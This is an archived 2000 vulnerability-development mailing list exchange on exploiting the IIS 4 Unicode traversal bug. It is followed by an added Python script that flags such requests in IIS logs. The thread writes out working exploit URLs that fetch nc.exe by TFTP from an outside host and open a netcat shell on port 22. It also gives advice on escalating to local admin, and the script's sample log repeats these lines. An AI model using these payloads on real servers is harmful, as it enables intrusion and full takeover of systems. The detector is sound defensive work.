Vulnerability Development mailing list archives

Re: dos commands via iis 4 (TFTP)


From: MadHat <madhat () UNSPECIFIC COM>
Date: Mon, 13 Nov 2000 12:25:37 -0600

"Loschiavo, Dave" wrote:

Thanks, looks like I inadvertently left the "get" out of the message. I was
including that in the URL when testing. However, what I did notice was the
use of the quotes in the "-i" area of the URL. I was not using quotes. Will
have to give that a shot.

Shouldn't need the quotes, but you probably do want to tell the tftp
where to put the file.  When I tested this, I placed the nc.exe in the
scripts dir,
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe

then used
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe

Unicode was still used as the scripts dir is usually set as script access
only and not execute; if there is a cgi-bin dir with execute access this
can make it a lot easier for someone to abuse.  If called from IE, I
found that the \ don't need to be escaped, but may need to be in
Netscape.

So after this, there is a port open (22 in this case as many admins will
leave this open for SSH, but this is an NT box, which as we know rarely
has SSH running on it) that I can telnet to and have a command prompt.
There are plenty of ways of doing this...  once on the box, use one of
the exploits to get IUSER_<MACHINE>, which is who you will be, added to
the local admin group, and you control the box.

Basic idea for the msadc as well, or any exploit that allows for simple
remote command execution.


-thanks

-----Original Message-----
From: Robert A. Seace
To: DLoschiavo () frcc cc ca us
Cc: VULN-DEV () SECURITYFOCUS COM
Sent: 11/10/00 10:11 AM
Subject: Re: dos commands via iis 4 (TFTP)

In the profound words of Loschiavo, Dave:

I tried tftp commands in the URL, formatted like this:

http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/tftp+-i+192.168.1.20+nc.exe"

and got nowhere, while this:

http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

gave me a listing of the c: drive.

Am I formatting the "TFTP" URL incorrectly?

        Yeah, I think so...  But, I'm no TFTP guru, either...
Personally, I would just use RCP...

        However, looking at the original advisory on BugTraq, that
mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"),
I think you need a "GET" before the "nc.exe", and maybe a destination
location specified after it, for where to place it on the NT box...
For instance, it shows an URL of:

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe

--
MadHat at unspecific.com
                                   "The 3 great virtues of a programmer:
                                      Laziness, Impatience, and Hubris."
                                                 --Larry Wall
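A log-side check for the traversal pattern this thread is about, added here as an example; it is not code from the thread or from any of its posters. It assumes the W3C extended log field order listed in FIELDS, and the log lines in SAMPLE_LOG are constructed to mirror the requests described above. It goes one step beyond the thread's %c0%af sequence: any two-byte sequence led by 0xC0 or 0xC1 is flagged, because those lead bytes can only start an overlong encoding, which valid UTF-8 never contains and which a strict decoder should reject rather than normalize into a "/".

```python
"""Flag IIS web-log requests that use the overlong-UTF-8 traversal discussed in
this thread (..%c0%af.. reaching cmd.exe, then tftp or nc).

Added example, not code from the thread or any of its posters. It assumes the W3C
extended log layout in FIELDS below; the log lines in SAMPLE_LOG are constructed.
"""
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Assumed W3C extended field order; adjust to match the #Fields: header of your logs.
FIELDS = ["date", "time", "c-ip", "cs-username", "s-ip", "s-port",
          "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

# Programs the thread shows being reached through the traversal or fetched afterwards.
SUSPECT = re.compile(rb"\b(cmd\.exe|tftp(?:\.exe)?|nc\.exe|ncx99\.exe)\b", re.IGNORECASE)

# Constructed sample in the FIELDS layout ('+' is how IIS logs spaces in the query).
SAMPLE_LOG = r"""#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
2000-11-13 12:20:01 10.1.1.7 - 10.1.1.2 80 GET /default.htm - 200
2000-11-13 12:21:44 10.1.1.9 - 10.1.1.2 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c: 200
2000-11-13 12:22:10 10.1.1.9 - 10.1.1.2 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+10.1.1.9+get+nc.exe+c:\inetpub\scripts\nc.exe 200
2000-11-13 12:23:05 10.1.1.9 - 10.1.1.2 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe 200
"""


def overlong_sequences(raw: bytes) -> list:
    """Every two-byte sequence led by 0xC0 or 0xC1. Those lead bytes can only begin
    an overlong encoding of a code point below U+0080, which valid UTF-8 never uses;
    %c0%af is the overlong form of '/' that the thread's URLs depend on."""
    return [raw[i:i + 2] for i in range(len(raw) - 1)
            if raw[i] in (0xC0, 0xC1) and 0x80 <= raw[i + 1] <= 0xBF]


def parse_line(line: str) -> Optional[dict]:
    """Split one W3C log line into a dict keyed by FIELDS; header lines give None."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def analyse(line: str) -> Optional[dict]:
    """Return a finding for a suspicious request, or None for a clean line."""
    rec = parse_line(line)
    if rec is None:
        return None
    stem = unquote_to_bytes(rec["cs-uri-stem"])    # percent-decode once, as the server would
    query = unquote_to_bytes(rec["cs-uri-query"])
    reasons = []
    seqs = overlong_sequences(stem)
    if seqs:
        reasons.append("overlong UTF-8 in path: " + " ".join(s.hex() for s in seqs))
    if b"../" in stem or b"..\\" in stem:
        reasons.append("parent-directory traversal in path")
    executables = sorted({m.decode().lower() for m in SUSPECT.findall(stem + b" " + query)})
    if executables:
        reasons.append("suspect program referenced: " + ", ".join(executables))
    if not reasons:
        return None
    return {"c-ip": rec["c-ip"], "time": rec["time"], "status": rec["sc-status"],
            "executables": executables, "reasons": reasons}


def scan(log_text: str) -> list:
    """Apply analyse() to every line and collect the findings in log order."""
    return [f for f in (analyse(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["c-ip"], "status", f["status"], "->", "; ".join(f["reasons"]))
```

Run against a real log, the three reasons together (overlong bytes in the path, a traversal, and cmd.exe followed by tftp or nc in the query) are the sequence MadHat describes: first the shell, then the file fetch, then the listener. A 200 status on the cmd.exe request is the line that matters, since it means the server actually ran it.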

